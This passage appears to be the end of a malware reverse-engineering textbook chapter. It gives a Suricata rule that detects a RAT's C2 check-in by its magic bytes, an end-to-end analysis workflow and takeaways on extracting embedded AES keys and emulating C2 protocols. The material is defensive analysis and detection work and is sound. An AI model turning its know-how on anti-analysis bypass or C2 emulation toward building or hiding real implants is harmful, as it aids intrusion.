# Magic bytes 0xDEADBEEF at TCP payload offset 0 → custom C2 protocol alert tcp $HOME_NET any -> $EXTERNAL_NET any ( msg:"MALWARE CustomRAT C2 Check-In Magic Bytes"; flow:established,to_server; rawbytes; content:"|EF BE AD DE|"; depth:4; // magic at offset 0 (little-endian) byte_test:1,<,6,4; // cmd_id byte must be < 0x06 threshold:type limit, track by_src, count 1, seconds 60; classtype:trojan-activity; sid:9000100; rev:1; ) # This rule detects the C2 protocol regardless of which IP/domain the C2 moves to # Because it matches the protocol structure — not infrastructure IOCs

The Complete RE Workflow — End to End

This chapter has demonstrated every stage of the full reverse engineering pipeline. Bringing it together as a summary of what Book 2 has covered:

Unpack (Ch. 4) — identify the packer, find the OEP with the ESP trick, dump with Scylla
Deobfuscate (Ch. 5) — identify and script the XOR decryption routine; defeat control flow obfuscation
Resolve imports (Ch. 6) — identify API hashing scheme, build lookup table, annotate Ghidra call sites
Bypass anti-analysis (Ch. 7–8) — configure ScyllaHide, fix the VM baseline, patch remaining checks
Disassemble and annotate (Ch. 2–3) — iterative renaming from known API calls outward; IDA graph for complex functions; x64dbg to fill in dynamic values
Characterise the payload (Ch. 9–11) — shellcode bootstrap if applicable; identify cryptographic constants; understand the key architecture
Reverse the protocol (this chapter) — find communication function, parse the format, extract keys, emulate in Python
Produce detection artefacts — YARA rule from static indicators, Sigma rule from behavioural indicators, Suricata rule from protocol structure
Report — ATT&CK technique map, capability summary, IOC list, detection coverage assessment

Key Takeaways — Chapter 12

Working backward from network API imports (HttpSendRequestA, InternetOpenA) to their call sites in Ghidra leads directly to the C2 communication function — this is always the fastest path to the most important function
The command dispatch switch statement reveals the implant's full command set — every case is a capability; naming each handler function turns the switch into a complete capability inventory
Hardcoded AES session keys in the binary can be extracted and used to decrypt traffic captures — even without the C2 server, captured traffic between the implant and server becomes readable
Protocol-level Suricata rules detect the C2 regardless of infrastructure rotation — a magic byte match at a fixed offset in the TCP payload is a stronger long-term indicator than a domain or IP that will be rotated in days
Emulating the C2 protocol in Python confirms your understanding is correct — if your emulated packet generates a valid server response, the protocol reverse engineering is accurate; this is the verification step that transforms analysis into confirmed knowledge